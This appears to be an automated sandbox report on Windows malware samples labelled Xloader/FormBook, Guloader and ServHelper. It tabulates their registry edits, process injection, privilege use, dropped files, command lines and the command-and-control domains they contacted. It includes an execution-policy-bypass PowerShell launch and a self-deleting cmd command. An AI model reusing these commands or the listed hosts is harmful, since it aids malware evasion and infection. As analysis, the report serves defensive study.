| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
"C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe"
Network
Files
memory/1652-60-0x0000000076641000-0x0000000076643000-memory.dmp
memory/1652-61-0x0000000074BA1000-0x0000000074BA3000-memory.dmp
memory/1652-62-0x0000000004750000-0x000000000481C000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win7v20210410
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2020 set thread context of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 1912 set thread context of 1272 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 268 set thread context of 1272 | N/A | C:\Windows\SysWOW64\chkdsk.exe | C:\Windows\Explorer.EXE |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\chkdsk.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\chkdsk.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\chkdsk.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\chkdsk.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe
"C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.aliyunwangpan.com | udp |
| N/A | 103.139.0.9:80 | www.aliyunwangpan.com | tcp |
| N/A | 8.8.8.8:53 | www.discoglosse.com | udp |
| N/A | 154.95.193.104:80 | www.discoglosse.com | tcp |
| N/A | 8.8.8.8:53 | www.themuslimlife.coach | udp |
| N/A | 198.54.117.211:80 | www.themuslimlife.coach | tcp |
| N/A | 8.8.8.8:53 | www.somatictherapyservices.com | udp |
| N/A | 34.102.136.180:80 | www.somatictherapyservices.com | tcp |
| N/A | 8.8.8.8:53 | www.inverservi.com | udp |
| N/A | 69.49.115.40:80 | www.inverservi.com | tcp |
| N/A | 8.8.8.8:53 | www.shareusall.com | udp |
| N/A | 204.11.56.48:80 | www.shareusall.com | tcp |
| N/A | 8.8.8.8:53 | www.simplysu.com | udp |
| N/A | 35.166.17.12:80 | www.simplysu.com | tcp |
| N/A | 8.8.8.8:53 | www.livingstonpistolpermit.com | udp |
| N/A | 208.92.209.208:80 | www.livingstonpistolpermit.com | tcp |
| N/A | 8.8.8.8:53 | www.mpsaklera.com | udp |
| N/A | 72.44.69.242:80 | www.mpsaklera.com | tcp |
| N/A | 8.8.8.8:53 | www.thefutureinvestor.com | udp |
| N/A | 34.102.136.180:80 | www.thefutureinvestor.com | tcp |
| N/A | 8.8.8.8:53 | www.juport.men | udp |
| N/A | 45.11.19.62:80 | www.juport.men | tcp |
| N/A | 8.8.8.8:53 | www.juport.men | udp |
| N/A | 45.11.19.62:80 | www.juport.men | tcp |
| N/A | 8.8.8.8:53 | www.cohen-asset.com | udp |
| N/A | 184.168.131.241:80 | www.cohen-asset.com | tcp |
| N/A | 8.8.8.8:53 | www.girasmboize.com | udp |
| N/A | 142.250.179.179:80 | www.girasmboize.com | tcp |
| N/A | 8.8.8.8:53 | www.sukrantastansakarya.com | udp |
| N/A | 18.159.10.128:80 | www.sukrantastansakarya.com | tcp |
| N/A | 8.8.8.8:53 | www.vetscontracting.net | udp |
| N/A | 34.102.136.180:80 | www.vetscontracting.net | tcp |
| N/A | 103.139.0.9:80 | www.aliyunwangpan.com | tcp |
Files
memory/2020-60-0x0000000000820000-0x0000000000821000-memory.dmp
memory/2020-62-0x00000000071F0000-0x00000000071F1000-memory.dmp
memory/2020-63-0x0000000000810000-0x0000000000812000-memory.dmp
memory/2020-64-0x0000000007080000-0x0000000007103000-memory.dmp
memory/2020-65-0x0000000004170000-0x00000000041A6000-memory.dmp
memory/1912-66-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1912-67-0x000000000041D0F0-mapping.dmp
memory/1912-69-0x0000000000170000-0x0000000000180000-memory.dmp
memory/1912-68-0x00000000008D0000-0x0000000000BD3000-memory.dmp
memory/1272-70-0x00000000062E0000-0x00000000063C7000-memory.dmp
memory/268-71-0x0000000000000000-mapping.dmp
memory/1516-72-0x0000000000000000-mapping.dmp
memory/268-73-0x0000000000370000-0x0000000000377000-memory.dmp
memory/268-74-0x0000000000080000-0x00000000000A9000-memory.dmp
memory/268-75-0x00000000021B0000-0x00000000024B3000-memory.dmp
memory/268-76-0x00000000004E0000-0x000000000056F000-memory.dmp
memory/1272-77-0x00000000064F0000-0x00000000065B9000-memory.dmp
memory/268-78-0x0000000076281000-0x0000000076283000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
153s
Max time network
162s
Command Line
Signatures
Xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 800 set thread context of 2308 | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2308 set thread context of 3044 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 3572 set thread context of 3044 | N/A | C:\Windows\SysWOW64\cmmon32.exe | C:\Windows\Explorer.EXE |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe
"C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.citestftcwaut17.com | udp |
| N/A | 8.8.8.8:53 | www.askmeboost.com | udp |
| N/A | 45.93.101.42:80 | www.askmeboost.com | tcp |
| N/A | 8.8.8.8:53 | www.aliyunwangpan.com | udp |
| N/A | 103.139.0.9:80 | www.aliyunwangpan.com | tcp |
| N/A | 8.8.8.8:53 | www.hofmann.red | udp |
| N/A | 8.8.8.8:53 | www.junrui-tech.com | udp |
| N/A | 8.8.8.8:53 | www.pheamal.com | udp |
| N/A | 192.0.78.25:80 | www.pheamal.com | tcp |
| N/A | 8.8.8.8:53 | www.sukrantastansakarya.com | udp |
| N/A | 52.29.206.172:80 | www.sukrantastansakarya.com | tcp |
| N/A | 8.8.8.8:53 | www.inverservi.com | udp |
| N/A | 69.49.115.40:80 | www.inverservi.com | tcp |
| N/A | 8.8.8.8:53 | www.girasmboize.com | udp |
| N/A | 142.250.179.179:80 | www.girasmboize.com | tcp |
| N/A | 8.8.8.8:53 | www.dietrichcompanies.com | udp |
| N/A | 34.102.136.180:80 | www.dietrichcompanies.com | tcp |
| N/A | 8.8.8.8:53 | www.bonacrypto.com | udp |
| N/A | 34.102.136.180:80 | www.bonacrypto.com | tcp |
| N/A | 8.8.8.8:53 | www.redevelopment38subhashnagar.com | udp |
| N/A | 94.130.13.121:80 | www.redevelopment38subhashnagar.com | tcp |
| N/A | 8.8.8.8:53 | www.blackcouplesofhtown.com | udp |
| N/A | 34.102.136.180:80 | www.blackcouplesofhtown.com | tcp |
| N/A | 8.8.8.8:53 | www.somatictherapyservices.com | udp |
| N/A | 34.102.136.180:80 | www.somatictherapyservices.com | tcp |
| N/A | 8.8.8.8:53 | www.daiyncc.com | udp |
| N/A | 156.254.194.185:80 | www.daiyncc.com | tcp |
Files
memory/800-114-0x00000000006F0000-0x00000000006F1000-memory.dmp
memory/800-116-0x0000000007AF0000-0x0000000007AF1000-memory.dmp
memory/800-117-0x0000000007690000-0x0000000007691000-memory.dmp
memory/800-118-0x00000000075F0000-0x0000000007AEE000-memory.dmp
memory/800-119-0x0000000007610000-0x0000000007611000-memory.dmp
memory/800-120-0x0000000009A50000-0x0000000009A51000-memory.dmp
memory/800-121-0x0000000004BD0000-0x0000000004BD2000-memory.dmp
memory/800-122-0x00000000092B0000-0x0000000009333000-memory.dmp
memory/800-123-0x0000000009340000-0x0000000009376000-memory.dmp
memory/2308-124-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2308-125-0x000000000041D0F0-mapping.dmp
memory/2308-127-0x0000000001450000-0x0000000001460000-memory.dmp
memory/2308-126-0x0000000001490000-0x00000000017B0000-memory.dmp
memory/3044-128-0x0000000005800000-0x000000000597C000-memory.dmp
memory/3572-129-0x0000000000000000-mapping.dmp
memory/1544-130-0x0000000000000000-mapping.dmp
memory/3572-131-0x0000000000290000-0x000000000029C000-memory.dmp
memory/3572-132-0x0000000002900000-0x0000000002929000-memory.dmp
memory/3572-133-0x0000000004300000-0x0000000004620000-memory.dmp
memory/3572-134-0x0000000004150000-0x00000000041DF000-memory.dmp
memory/3044-135-0x00000000032C0000-0x0000000003387000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210408
Max time kernel
145s
Max time network
148s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.xivstatus.com | udp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 8.8.8.8:53 | mail.server.com | udp |
Files
memory/516-118-0x0000025DEE0D0000-0x0000025DEE0D1000-memory.dmp
memory/516-121-0x0000025DEE110000-0x0000025DEE112000-memory.dmp
memory/516-122-0x0000025DEE113000-0x0000025DEE115000-memory.dmp
memory/516-123-0x0000025DEE3A0000-0x0000025DEE3A1000-memory.dmp
memory/516-144-0x0000025DEE116000-0x0000025DEE118000-memory.dmp
memory/516-147-0x0000025DEE9A0000-0x0000025DEE9A1000-memory.dmp
memory/516-148-0x0000025DEF0A0000-0x0000025DEF0A1000-memory.dmp
memory/516-184-0x0000025DEE118000-0x0000025DEE119000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
14s
Max time network
114s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe
"C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe"
Network
Files
memory/3156-116-0x00000000021C0000-0x00000000021D3000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
137s
Max time network
163s
Command Line
Signatures
ServHelper
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3580db26-b82b-47d9-8e5f-e24f5b14eb4e | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1cf4031a-ca01-41ea-8046-44708c88615d | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_50bc70bd-f0fa-4b04-aebd-701ed7e4a96c | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ed7b35f6-9634-40a8-ac32-afa719ee2e50 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7cd598a8-2bd4-4e30-a321-a292ad4582c4 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ASY756RMWBBEDR3ACTXH.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5873f907-384f-419e-a7f2-77e336422f09 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_09b3c272-c5d6-4407-a44c-bd7b90aec184 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8db55974-e7ca-45a0-8d5a-6a13f50f228d | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd092868-a398-4a63-9e80-98d8bf5f0f99 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ffa327ee-faa2-4c99-abc7-a016aa600630 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_14a1c626-a976-4aa5-96b6-5b17ce6ba831 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a02933426885d701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
